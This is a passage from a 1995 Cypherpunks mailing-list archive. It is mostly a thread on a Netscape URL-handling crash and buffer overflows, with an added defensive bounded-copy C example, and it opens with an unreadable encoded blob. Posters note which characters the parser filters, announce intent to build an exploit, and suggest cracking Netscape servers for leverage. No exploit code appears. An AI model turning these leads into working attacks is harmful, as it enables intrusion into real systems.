M\D?FF7D2ZEL:JX4"K42?#JR1*))YG*F"C8)1RK@(JOHV ,(S(3&X7$8Z36H. M$Y6YT=FVMO,\$PHE$Q]'&]"(C9!%EI!FI#:<8!8A)[G&@ESE44(5(7VUXFA&:QJ5T M+I(]VQ*1"0H)]Q2]4\;<^)8GD #X9FK""3Y(? 
3 @GM M/+9/2 at E+[7FYH(UL8Y+S M:7Q:3^\2Z'$'MB1)#C)NFZ&D?"_&$*J*&6<-$H M"E[FCD&P#@ 2U8YUJ(O1Q? B$%>7%0T%&36,J'?03J!0E(DA]#<7[A*I?DS+GT0J0 M,USS,3;5%YL:YI!H$V!+X%$,QLQ5&P97M<6(+)[5%\(K$H!Z53&D+W.Q?G1^EA&^=K+X/P4W>13Y+L(KHB)5=UM,EE*;B<2<9U+Y<)L MOG&5SD&18OB?*D<7H%IY",)*PH at JLBK-JHRS9*!%;*2=8.M)4;UDW(BJ.EU7 MZ=TKN5/6[.,F+T at STJ5#HLI5(!*V>OB68^41C-B$^*0?Y$E6QU$8W5>E M2>3P3G9 at Y_7ZCGG].],2XIH52 "'%5HKSS" QU7, .X@ R_VYXY0]8/N M\XP2RF8%&7*1VDN(R&;#H8,UG&0.58 at D+U9V;DE;EVE>M8#NYWX at _E/&H3A> MS2-&.PQ'2%X+YQFW2%X@ M!$4^=4<8="5DKRGE<(]W&')DWJC;!,MTMLGK"4),X)+./>G'!/405^$F8'7*T)H<))W'2G&TW#K\K>X'^7'" MD"\*=>"?A270S-LSK!^2E)&R!B1O"DA]Q!%YIM)'K9E'SB7'//K:SCR&&"+D MT9.W%23N)R5!N("ZCUS/F 8$L&5"1!N3+T,ZGU1:.-<3#%VW=^)RSX#_0C B M746F$*F(FF6%">KFPLXP:4"];@>;B_,&"8]EIG$K-I:0YJMU%X'$%>59!M5S M?Z83S>^9#/QT74WO?I*G7G%,.]4WN5@&"/[T .B6^SSUKTX,]QS at 6'*Z*-+B MDX at XW_Q%MLC=N91 at -:16[CZ69>C3:?[YB'-21EV3JW8B[Y;$J^(J"EJ*KP3V M.329ON7"3W4\JQA#SJC."!JE:'T5>M:8;$%=;=K,/[9A3=%>TY:1=PQG_A-' M0'^A"O"QD4/@JS'%N'BF\F0&4 at U]21:PU06(]?&63BOP_YI[G@;85:N>6IXE MREJ at 4OL4GO)L;/##PT)#M?K59I[%,=4'>P(#BT%75229C;I*9[BR.<&-7^,G MD/&;4NTZ)@"6/^9%QV-I;L=9:"(-"58DR*C4I=>QH;*UJ#NJ>RF6^/'O9G'! 
ME8YD!6*GK at 635U0^C.I-<<.(;J4"A@@YYLK)H+'O M3>>_."8OO77U0.TD9Q[Q.P5;.3++N]>FA"(S-[%E\PR3.F(URP)IP,F<6P35 MAHDNU(KFC!!7?O)UBRF39FV54C0V!6&>[PT+)$=#AKM[ @<"/B8+*[?KJJ,L MQ at P(+I#?7OA9B952+&4,)$(,EC>2*8=(B]C@<3\&093*/(XN2"E?-23W*FF7 M9&.L)HI=3CE!*I,\H.Y4Y*6]#9ROP).!*'#-YLS\&5."M"_GI/B#"#J T M;)2!GY\\%^;A'UP,\Q+9_TJ^?< M2B-EK0^U>_& MLD2_"&$45J!,UH])AK.0BQ8N>KTL+OH.Q;M.2'FQ3E0 D)&04:V%%\B55G\2 M!=1B6S#T6N(BW_8I0->*/&XPFGD7!7O,7_,8/]3OJ]B=[C_XR"J#:^P ">J51I$\.6;QLRUL5!<<,;(K2 M9JG?+4'&R+V5TIF[%ALHU)DKYVN2+4Q]J>$Z)#6.4&&X8 at R-)B;1YKU7\])/ MWS:^OA16LV'5Q,NI*2P^T5NEF8*CSJA9-]'QE:HT M"K6]I=$2-)IW:T5KH3 0OKS;KN/R2N]G##]9@$+7M M)V!.%- 9]OF1GNV+F M=+Z421I [C4Q29%=Q64<49S1'/]->9Z8.%!B8* A=_3_ZGNN\H!!PNP;/9G& MV8\\<)% I.[Y_*?=&=.=VS>UD/\=Q7MGZ-5:.-L[94 E354G9;*X2-2,=+2U MC6:0#_>-1GH04O.]"H^7=[?7HP^/X\'MU=TG'L/KC;84$3E>, AYU?X>H*%!$@$+LB+Z!>*1U^>%'>HB# M:CD64E2O'"^I-;F74?/$][TMEH+&9H/G'HE0 at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at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at ST=*F^Y]6;_$#ZT]:J.:_?[JGV07;'M6IYL=!WRJ0/X MX#NA?^EQ !\& MG2C/:W7=@_C0Z*3=:[5=USJ$#X.R/-GKJI9W"!_:3CS5<%1'U0_APZ#%9MUJ M-:W6(7QHOVVI>L^RY&%\Z!C7;3>[JMTVI==HM at _B0Z-WZ7;=AFT? 
MI _V6V7W.FZS7_!!-0M7+U0&/#7YT\L@/H3^/F)/YT?(I'S?I;_>U=^1 M8!-J[=\SE2F1A7.Y7*[WU80+_YLYRWQ?\&1JOF<:3:CDGNE!G8 at GTQ4\\FOT MUN)Q*>G;I[=% ?EZ6?[VGU!W:BW$NWVB(_QW\5I,4AFG8O19-V'X'V5Q=;SU M"0]W@(BQHX5:.,OUL?]4$SB5QT_IE^DBG4&^WU7D8<%)K?+;F$-),_63BET7 M",+<4D*)?>P3A36Q)#D8KD[RN]X*7_Q8Y5SXIZ"!XHY:WO.*N<:VW.-1YG4E?0Y%[T$S_E38?"[@T=<$6!W[^8>=I;OX M84"]J.)E>M[^),J>:\OJQLH1_:,IW5;A9K8SKXP7;7OC=Z#A^"\\('[X051] MX^3_VSO6YK9MY&?Z5Z"^N8QD439%R7JY]HR3*'=I;,MC)]=TV at R'EBF;-?4H M*=G)M+[??OL "#XEQ:G[H7.91*( + @L]@GL(@B4X->0%D*NU<\:I;7:)USH M$9\*0'<);!\E"%M2)K;@ ?#O+#_228*17S+#>!1>$'E4FQO6X]HUI>BY1""- MWM7*QQW*XT5>U2C5@'>?,8(EOW+9M2I=IN3J[, 4:7V$/G'AB"NUXH%W[P5F M;N4>;OW $Q6&J-?%D;!HR7+$ N_;H74R)3QAD]Z67= MZ=);P_P&?9C9SU^S0 K#A3RGUG#L64G/SLR@#C'MJ#V MZ&3,Y*@#6^E"=3Y& A,^,/O%#3#885$01Y:,BWB at Y,8K]RKXPG T6<#NC](F M(&9Q1[R\Y6$0#$RCH at AC&1RAD(]G$;%LI+8HP*DYT,RO_GCL8WB44"="R6-! MGBHTX^;I1O%!8192=YNM56_59XPLG*#P>^ FH>KK^09VHH4=-[$/$G/!,[C4 M&E7%T1'+-]+MM%0DW>0 !)6 #D>BX%Z.CJ1$Q WPA&0!GJZP^*B*%W)VL>*3 MOZLL5C"]&/M-<#\=&@H^[;C&COQFM^TXU031##$,$4I-C 3G &4,?L10C%G M*>1$K$P?8'\L)QSCQ.#$-C<8J "<*>P">@/ CQ\_LB"8>MYUQ(#^%(,;_!M7 M)B(C?0CXFBT75\Z\ AXT*'CT#*L':!$ 68]N9:H"DN7QY?$Y4U21&/2GW$?+ M GN,O8N29NE&18+27BT<]2'G"O&8.E%7Q['ZT/(KP^_6&=(O,B?B%%T3 at UX+T69&H1J4X2Q]I^-L32F5D8;/@$W.%( 11M&GK?SN"BJ=0WZL@?V M\/N3)*9R+2C#ZZ/"K+!L5I2R450&*8=/NRID6F3ZE at ETD59TH8='Q4J59M4> MQE\%WCB.R6;['-T]7YN^<9)Y'(.9M:\HZ)&R34$#4]Z6"A at JMG;)[&$T;&!$ M(?7OX(QC^U8'JK/*7,P<, Q"K31C POP!FX5^4W05#N*B\FMH7B)[ MUTE>=$,LY;EL1/-B0Z*GWGB.T$?3[K39 )-%AUQ$/. at A/)<7\F3]$-&@HBT* M1_F]-"K#DOB+0O^UW3K0]JG,&V!C/PZO0-VH%DKN.4J']]!BOQ:W% MY3:7][I7[O5H[,7E32YO6$U[O]4A099VL:&1F0D(2DZ*O?C1G!&EG?>$XX[5 MM<-VBR>3[UR[_Z.Y]+4!)9K T2LB[]I9S,91A?(V"%#2%X%H!XH=\>)6DI2 M/#35X7X4"G%=\L at DA@D+\+52LLDPC#A:G8/N=- ZF_!*E,4)QEJ:K,^/+TI> M3R9T<>9]TE';,.&%14=6**7T!2P.RZ(J":-8 EFQO$]')V+O:%5E at JS\*8;] M[/"W*0O'R$0[]&4F!%YN@$@,2BP 0U=1OB3#EE+V E[M2ALF57H.' 
MU/2UNLM,V%E.*5?$N]YXZAPQ(E9AX!M&F BQI"L&#^!'Q\GF*[,59;[>0D9 A^!2+,#,!\T>34#!RZADJ!:3641N^1BP1!E4 MB+11#EP5/=E8--;7?]ALUS%#<2L:)$ MT"2DS.INUPDRL9$DR[SC'ZRDU>*58?5S-=VF$(6?=9COX;?_V;IX=4F3Z,>" MR8TF==P\V(.J/3I-"G9OS?LM$,:A[U%N7NCQA5FBL=O8 at I&,17TIZB'\RO>B M>MCB[+B26 at .%YI[5VT-!VNQ;K7[#,K#WI.Q=!]6$OSV2O/M=LRUJ\ DB'&1O M'/9Z>>R<#4^/+]\9N!G ?U*UP[/!Y;^'[Z&Z&U?'#.0X[P879X,3QTD>O8&8 MN'>#):=X1:XS#MP;SG:A5%W* I7IFU+PB('A%XICG1V M$8PLONZ)4A+QII]EI!-#R^$30 at -Z.;\8OAPD)IJJO#P^/3\9*/T(!1>#R_?' M%^^3VC2!+9 E+T^&K]Z)^(^%^SF,#8?"*T6"* 7XX2P%VE" R^E:T,O! M>UQ!!6HKT,A;+%3J/,."C(_N$/[Y&,4-YK?NMW,*=U/**NGJ+-7;\+>05U:# MP=\V,4O;0F:!SQ7,(IFA6\(L7-OX/[-\!;,TGLHL]M.9I?F7,TOJ3E;DDU/W MSB.MN2F?I'I0T,0BA34%FJ03<\"_Z MAZ3K=]TM<>H,7_YP"9CM'V*#^(=8++XX_FQW)J8./,(WG at _. @^>E.J'QX at N M[X2'7[;J!H.,%OA[3C#WBUV\>&F"CR,G&H6>-Z7&M\!,UX%[O2.1H6Y![A9/P.&%BGK\=5/KTZ.7P\NGYM,<"*CI]$(@>8) MA(KSU&%;Q=11U'R_T6]*TFBCS(1/)HU\GF$ G(FY?ODJ<#Q**M9D'XHD3";[ M4!3E&>) ;9M&:MN*BI5T@'',G3N8I4%/\*#K\(8=!TQ6[\Y SY@?=36F,7D. M-C+X$1MIX1@/TBQ?.4,X52L3'@X1BRKA!ZX9$3D$\ MJEIF5+A'$?L.^#,Y>?R-XS-I@&/$)+:^]D,^S\K4,=L55A&G0XV1K\+5R\(D M< %SF<:(J&V$KL)$S"QBEE^%&>U5_9UP%"MZ$1]Y+&0,$Z)JNJD'.:]N$<%' M#SX>?59.WYX-+RK4NG[D.^&U=U_%37-B at 199:\TV^#8M9@&#;E?J]/'1P.[J M1V-X/QZ!T>QQB0ZH4FVG%W."[*C;)W\VW5%BM3F81^_,$U"O"&A9"B4Q)_!, M?.PN at P4/7N[WU0=GP]>#_^"8'WG2[1Y.NF7MFSV:,V*+#C>\&S\")]D9W2*6 M*J>#4^?T^(?AA;D-Z[!MOI"K at 2.H5O$=\Q 6Z:ZRO9RJ:R]N/+P.[%JR^RC5Y"2A0]RK#/&(A?0VM*O$A=!4I'L]OR#[ M-0,9S/. 
From cman at communities.com Fri Sep 22 13:49:15 1995
From: cman at communities.com (Douglas Barnes)
Date: Fri, 22 Sep 95 13:49:15 PDT
Subject: Another Netscape Bug (and possible security hole)
Message-ID:

>> Spent too much time last night playing with the Netscape bug;
>> among other things wrote some code to throw various random binary
>> URLs at Netscape. Netscape seems prepared to swallow the bait
>> as long as the URL does _not_ contain characters screened as
>> follows:
>>
>> if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {
>>
>> This means you can't plant 0x00, 0x22, 0x3e or 0x2f.
>
> Did you check 0x20 and 0xa0? (space and shift-space) I'm sure
> that a space will terminate the href in .
>

This seems not to be the case. See:

http://www.communities.com/foo/bad.html

(which contains these bytes fairly early in the sequence, and still does a lovely job of crashing.)

Showed the bug to EC's president, he immediately wanted to try it. It completely blew his PPC Mac (I've got a Powerbook 540C) out of the water. (Error of type 11, dialog with only the restart button.) My powerbook hangs on for a bit and then locks up.

Onward to the exploit!
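The crash Barnes reports is what an unchecked copy of an arbitrarily long URL into a fixed-size buffer looks like from the outside, and the replies from Herb Sutter and John Lull in this thread ask for a bounded copy that is guaranteed to terminate. As an added example, not code from the thread or from Netscape, here is such a routine (named strbcpy/strbcat as Lull suggests, with the same contract as BSD strlcpy) beside the strncpy pitfall it replaces; the 64-byte href buffer and the constructed URLs are assumptions of the example.

```c
#include <stdio.h>
#include <string.h>

/* Bounded copy: never writes past dst[size-1] and always NUL-terminates.
 * Returns strlen(src); a result >= size means the copy was truncated
 * (the BSD strlcpy contract). Added example, not Netscape's code. */
size_t strbcpy(char *dst, const char *src, size_t size)
{
    size_t srclen = strlen(src);
    if (size == 0)
        return srclen;                       /* nothing can safely be written */
    size_t n = srclen < size - 1 ? srclen : size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return srclen;
}

/* Bounded append with the same guarantees. Returns the length the result
 * would have had without truncation; >= size means it was cut short. */
size_t strbcat(char *dst, const char *src, size_t size)
{
    size_t dstlen = 0;
    while (dstlen < size && dst[dstlen] != '\0')
        dstlen++;
    if (dstlen == size)
        return size + strlen(src);           /* dst not terminated: refuse */
    return dstlen + strbcpy(dst + dstlen, src, size - dstlen);
}

/* Constructed buffer size for the demo; the thread does not say how large
 * Netscape's own URL buffer was. */
enum { HREF_MAX = 64 };

struct anchor { char href[HREF_MAX]; };

/* Strict policy for a parsed href: an over-long URL is refused outright
 * rather than silently truncated into a different URL. 1 = stored, 0 = rejected. */
int anchor_set_href(struct anchor *a, const char *url)
{
    if (strbcpy(a->href, url, sizeof a->href) >= sizeof a->href) {
        a->href[0] = '\0';
        return 0;
    }
    return 1;
}

/* Builds a constructed URL ("http://" padded with 'A' to len characters,
 * len < 256) and reports anchor_set_href's verdict on it. */
int demo_store_url(size_t len)
{
    static const char prefix[] = "http://";
    char url[256];
    size_t plen = sizeof prefix - 1;
    if (len >= sizeof url)
        return -1;
    memcpy(url, prefix, plen);
    if (len > plen)
        memset(url + plen, 'A', len - plen);
    url[len] = '\0';
    struct anchor a;
    return anchor_set_href(&a, url);
}

/* The strncpy pitfall Sutter's reply warns about: for a source of HREF_MAX
 * or more characters strncpy fills dst with no terminator, so the next
 * strlen or strcpy on it reads past the buffer. 1 = terminated, 0 = not. */
int strncpy_terminated_for_len(size_t len)
{
    char src[256], dst[HREF_MAX];
    if (len >= sizeof src)
        return -1;
    memset(src, 'A', len);
    src[len] = '\0';
    memset(dst, 'X', sizeof dst);            /* no stray NUL to mask the bug */
    strncpy(dst, src, sizeof dst);
    return memchr(dst, '\0', sizeof dst) != NULL;
}

int main(void)
{
    printf("63-char URL stored: %d, 64-char URL stored: %d\n",
           demo_store_url(63), demo_store_url(64));                        /* 1, 0 */
    printf("strncpy terminated at 63: %d, at 64: %d\n",
           strncpy_terminated_for_len(63), strncpy_terminated_for_len(64)); /* 1, 0 */
    return 0;
}
```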
From lull at acm.org Fri Sep 22 13:52:27 1995
From: lull at acm.org (John Lull)
Date: Fri, 22 Sep 95 13:52:27 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221341.JAA07664@gold.interlog.com>
Message-ID: <199509222051.NAA10687@ix.ix.netcom.com>

On Fri, 22 Sep 1995 09:47:35 -0400, herbs at interlog.com (Herb Sutter) wrote:

> Don't just look at this bug, though... check ALL your static buffers and
> include code to check for overflow writes. For example, if Netscape is
> written in C or C++ and the above code uses strcpy(), you could change
> strcpy() to strncpy() everywhere (and then set the last char to null in case
> strncpy() didn't). Your programmers will know what I mean.

Better yet, ban both strncpy and strncat. Replace them with differently-named routines (strbcpy and strbcat?) that, given a buffer length, are GUARANTEED to always give you a properly terminated string that (including the terminator) does not overflow the specified buffer. Even better, use a good string class that does all this automatically all the time.

From sameer at c2.org Fri Sep 22 14:08:40 1995
From: sameer at c2.org (sameer)
Date: Fri, 22 Sep 95 14:08:40 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To:
Message-ID: <199509222103.OAA02827@infinity.c2.org>

> > Not that I want to divert attention away from netscape(OK, maybe I
> > do :-) ), but does this bug exist in any other common browser?
> >
> > --Jeff

This shows that Netscape will probably, after much bad press and sleepless nights on the part of netscape developers, become one of the best secure programs out there. The cypherpunks will have won because there will be a secure program available with the backing of lawyers. Netscape will have won because their product will be the best.
--
sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org

From Dave_Neuenschwander at va.arca.com Fri Sep 22 14:27:01 1995
From: Dave_Neuenschwander at va.arca.com (Dave Neuenschwander)
Date: Fri, 22 Sep 95 14:27:01 PDT
Subject: Fwd: Re: Project: a standard cell random number generator
Message-ID: <920706973.5067212@va.arca.com>

Jeff,

Yes, Fortezza cards can be instructed to produce a random number through one of its library calls (someday they'll have a real API). One of the diagnostic tools I had tested this function. What algorithm do they use? Haven't a clue. Sources say that the RNG implementation may vary from vendor to vendor (i.e., GTC, Spyrus, Mykotronix, etc.).

Daven
----------------------------------------------------------------------
Arca Systems, Inc. Leaders in Security Integration
----------------------------------------------------------------------

From samman-ben at CS.YALE.EDU Fri Sep 22 14:59:38 1995
From: samman-ben at CS.YALE.EDU (Rev. Ben)
Date: Fri, 22 Sep 95 14:59:38 PDT
Subject: ip: Freeh: Kiddie Porn was Encrypted (fwd)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

From: sobel at epic.org (David L. Sobel)

In an address at the International Cryptography Institute conference in Washington today, FBI Director Louis Freeh revealed that the Bureau encountered encrypted material during the course of its "Innocent Images" investigation. That operation recently led to dozens of nationwide arrests for alleged trafficking in child pornography via America Online. Freeh also disclosed that encrypted files were found during the course of a terrorism investigation in the Philippines involving an alleged plot to bomb a U.S. airliner and assassinate Pope John Paul II.
The FBI Director characterized encryption as a "public safety" issue and stated that the FBI and law enforcement agencies around the world "will not tolerate" a situation in which the wide availability of encryption may impede those agencies' "public safety functions." While noting that the current U.S. government policy is to encourage the "voluntary" adoption of key-escrowed encryption techniques, Freeh raised the specter of a mandated "solution." Freeh stressed that the FBI "prefers" a "voluntary approach," but likened the encryption issue to last year's Digital Telephony debate, where the FBI first attempted to achieve voluntary compliance but eventually sought and obtained a legislative mandate to assure law enforcement access to digital communications. Freeh indicated that "if consensus is impossible" on the encryption issue, the FBI "may consider other approaches." Following his prepared address, Freeh was asked why the FBI needs key-escrow when it has apparently been successful in decrypting information encountered in the cited investigations. His response to this question was somewhat vague, leaving unanswered the question of whether or not the Bureau was, in fact, able to decrypt the encrypted files seized in the "Innocent Images" investigation. More information on this point is likely to emerge as these cases come to trial. 
David Sobel
Legal Counsel
Electronic Privacy Information Center
http://www.epic.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3
-----END PGP SIGNATURE-----

From elkins at zzyzx.aero.org Fri Sep 22 16:01:15 1995
From: elkins at zzyzx.aero.org (Michael Elkins)
Date: Fri, 22 Sep 95 16:01:15 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509222051.NAA10687@ix.ix.netcom.com>
Message-ID: <95Sep22.160107pdt.111128-3@aero.org>

A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL:

From bret at bjohns.win.net Fri Sep 22 16:27:39 1995
From: bret at bjohns.win.net (Bret A. Johnson)
Date: Fri, 22 Sep 95 16:27:39 PDT
Subject: Netscape to end Linux support?
Message-ID: <1871@bjohns.win.net>

What? Who can I call at Netscape? I have not gotten a recent version to work with 1.2.8..

>> And the sad part is that now that they have announced that they are
>> dropping their unofficial Linux support, I really want to hurt
>> Netscape badly.
>>
>> Sigh.
>
> Anyone got a pointer to this announcement?
>
> Damn! Just when I was starting to like them ...
>
> --
> Jeff Simmons jsimmons at goblin.punk.net

From perry at alpha.jpunix.com Fri Sep 22 16:35:43 1995
From: perry at alpha.jpunix.com (John Perry)
Date: Fri, 22 Sep 95 16:35:43 PDT
Subject: 2 new MixMasters
Message-ID: <199509222335.SAA08173@alpha.jpunix.com>

-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone! There are two new type-II remailers that just started in operation today. These are type-II only remailers. There is no type-I support. I vouch for these two remailers as I know the individuals running them personally. Below are the public keys for these sites.
As a matter of fact, here is the type2.list and pubring.mix that mixmaster at vishnu.alias.net uses.

John Perry - KG5RG - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome!
WWW - http://www.jpunix.com
PGP 2.62 key for perry at jpunix.com is on the keyservers.

type2.list:
vishnu mixmaster at vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer at spook.alias.net ca8c8679f7b1cbdcff46d780fba97673 2.0
mix mixmaster at obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
crown mixmaster at kether.alias.net 409deae815e07f4c40188de1148c1499 2.0b11
knight mixmaster at aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
robomix robo at c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
hroller hroller at c2.org 0b7e31bbfbb0159eea07144ab15b45f3 2.0b11
syrinx syrinx at c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer at rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer at replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer at utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer at crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
flame remailer at flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
gondolin mixmaster at gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1
q q at c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer at armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1
precipice mixmaster at mix.precipice.com 05fef5887ac55dfe7379d0ef4a2a0c4b 2.0.1
anon mixmaster at anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret at secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From anonymous at freezone.remailer Fri Sep 22 16:47:15 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Fri, 22 Sep 95 16:47:15 PDT
Subject: MS Word Virus
Message-ID: <199509222347.TAA00888@light.lightlink.com>

For info and helpful links on the MS Word macro virus, see:
URL: http://csrc.ncsl.nist.gov/first/resources/word.html

---------
Information on the Microsoft Word Virus Reports
Comments welcomed: first-sec at first.org

This page contains links to information and related utilities for the Microsoft Word Macro Virus. The links and text on this page were mostly donated by a fellow FIRST member. The FIRST Secretariat would like to express its appreciation to this member and others who have contributed information.

Microsoft's Writeup: Microsoft has a writeup on the virus-like macro and has a scanning tool to remove the problem.
Macintosh advisory
DataFellows Web page: DataFellows (the people who produce FProt) has an excellent informational web page, including images of what you would see if you had the virus. Also, you can download DataFellows' utility, which works on both PC's and Macintoshes.
Download DataFellows Utility
IBM Writeup: An excellent write up by IBM.
NCSA page: The National Computer Security Association has a page which contains images of what you'd see if you had the virus.
S&S Writeup: A writeup by S&S, the makers of Dr. Solomon's Antivirus Toolkit
Sophos Plc: A page written by Sophos Plc.
AVP Page: Eugene Kaspersky of the AVP Computer Virus Research Lab wrote this excellent web page on the virus.
Dave Phillips Information page: A page written by Dave Phillips.
NH&A: A page consisting of an announcement and email traffic, written by NH&A.
Datawatch Virus Definition Update: Datawatch (Virex) present a virus definition update to their product to find this virus on Macintoshes.

From tomw at orac.engr.sgi.com Fri Sep 22 17:04:54 1995
From: tomw at orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 22 Sep 95 17:04:54 PDT
Subject: netscape bug
Message-ID: <199509230003.RAA06024@orac.engr.sgi.com>

In article , "Perry E.
Metzger" writes:

> I can tell you in general terms -- I don't write MIPS assembler
> myself. However, I will point out to you that you use an ancient
> Sendmail, and that it uses syslog(3) on user produced data, and that
> syslog uses a static buffer. Trick sendmail into logging something
> very big, and you can do what you like. The 8lgm people wrote a demo
> for Sparc as a proof of concept.

Hmm, after having looked at the syslogd code, it looks like this particular bug has been fixed for at least several years. However, there sure are a hell of a lot of fixed size buffers being allocated off the stack and some of them are being used in unsafe ways.

--
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything. -- Washington DC motto | tomw at engr.sgi.com

From anon-remailer at utopia.hacktic.nl Fri Sep 22 17:32:50 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Fri, 22 Sep 95 17:32:50 PDT
Subject: test
Message-ID: <199509230032.CAA28999@utopia.hacktic.nl>

--
sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org

From liberty at gate.net Fri Sep 22 17:37:47 1995
From: liberty at gate.net (Jim Ray)
Date: Fri, 22 Sep 95 17:37:47 PDT
Subject: The Next Hack
Message-ID: <199509230033.UAA37480@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

Al writes:
> Maybe a good tactic would be to crack a "secure" server, and send the results
> ONLY to the server operators, along with a description of machine-time involved.
>
> Put out a public press release, describing the machine-time involved, how it was
> possible due to weak crypto imposed by the government, and the possible
> economic and commercial implications of said weak crypto.
>

I'm with Lucky, let's go after Netscape itself. They deserve it more than their customers do, and they would then have a strong motivation to fix it.
The press release would then *only* involve Netscape, and maybe a few C-punks could buy a few Netscape puts ;) and donate the bucks made for something like Tim's stable remailer.

JMR

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh
-----END PGP SIGNATURE-----

Regards, Jim Ray
"People are deceived in masses, but enlightened one at a time." -- Dick Boddie.
-----------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35 James Milton Ray
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________

From tcmay at got.net Fri Sep 22 17:39:00 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 22 Sep 95 17:39:00 PDT
Subject: Netscape sub rosa?
Message-ID:

At 10:30 AM 9/21/95, Matthias Jordan wrote:
> Hello, Tim!
>
> > Gee, where's that "Cypherpunks logo" when you really need it?
> >
> > A rose covering the Netscape "N" logo? A crypto eagle swooping down and
> > pecking at weak keys?
>
> How about an anarchism-A (an A in a circle) with the circle not
> being totally closed thus describing a C?

That was actually done by someone in Monte Carlo when I was giving a talk on crypto anarchy. Somebody drew in this anarchy-in-a-C on an announcement of my talk. I still have this.

ObCypherpunks Relevance: This is "coding in C," isn't it?

--Tim May

BTW, to set the record straight, my "Gee, where's that "Cypherpunks logo" when you really need it?" was tongue-in-cheek (a kind of irony, for you foreigners).

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From dvw at hamachi.epr.com Fri Sep 22 17:50:33 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Fri, 22 Sep 95 17:50:33 PDT
Subject: RNG Resource FAQ (was Re: "random" number seeds vs. Netscape)
Message-ID: <30635951@hamachi>

Perry Metzger writes:
# You might want to read RFC 1750,

Phil Karlton writes:
> Did that. It talks about a lot of the pitfalls. Unfortunately it does not
> address (nor can it realistically be expected to address) details of what
> to look for on a particular version of an OS running on some particular
> platform.

Can someone point me to a compilation of such information? If not, I'm definitely interested in starting a Web page to chronicle recommendations about good, bad, and questionable random and pseudo-random sources for specific architectures and operating systems. (It could also include information on special-purpose plug-in hardware RNGs.)

-Futplex

Having overcome my initial skepticism on the entire topic of entropy, based on the useful pointers to the literature I have received, I agree wholeheartedly with the need for _positive_ design criteria against which designs may be evaluated. For initial consideration, I recommend the following:

The entropy E is defined by the sum across n states of -P_i log_2(P_i), where i ranges from 1 to n, and P_i is the probability of state i. In order for this expression to have meaning, all four of the following criteria must be met:

1) The states exist and can be identified.
2) The number of states n is known.
3) The index value i uniquely identifies a state.
4) The function P_i is known and well-behaved.

The designer should disprove the negative of each of these to arrive at a _concise_ statement of their "proof" of measured entropy equating to predicted entropy. For example, the designer should "disprove" the statements: "The states do not exist. Even if the states exist, they cannot be identified." by clearly stating the factors that lead to the existence of the states, and precisely why they can be identified. This provides a list of requirements (in effect) for a deployment to meet the expected entropy.

I think that application of these criteria can rigorously explain the difficulties in using mouse movements, for example, as a source of entropy. In addition, the problems with clocks in PC emulations on Macs also speak to these criteria. Certainly the entropy available from pid is also explained here in a rigorous way.

I would appreciate feedback on this as a foundation for a set of _positive_ design criteria for sources of entropy. If I have missed information in the literature that provides design guidance (not anecdotal pitfalls, which are very valuable but lack rigor in the cases I have seen), I would very much appreciate that as well. A special thanks to Tim May for his references.

dvw

From tomw at orac.engr.sgi.com Fri Sep 22 17:50:37 1995
From: tomw at orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 22 Sep 95 17:50:37 PDT
Subject: netscape bug
Message-ID: <199509230049.RAA06102@orac.engr.sgi.com>

I said:

In article , "Perry E. Metzger" writes:
>> I can tell you in general terms -- I don't write MIPS assembler
>> myself. However, I will point out to you that you use an ancient
>> Sendmail, and that it uses syslog(3) on user produced data, and that
>> syslog uses a static buffer. Trick sendmail into logging something
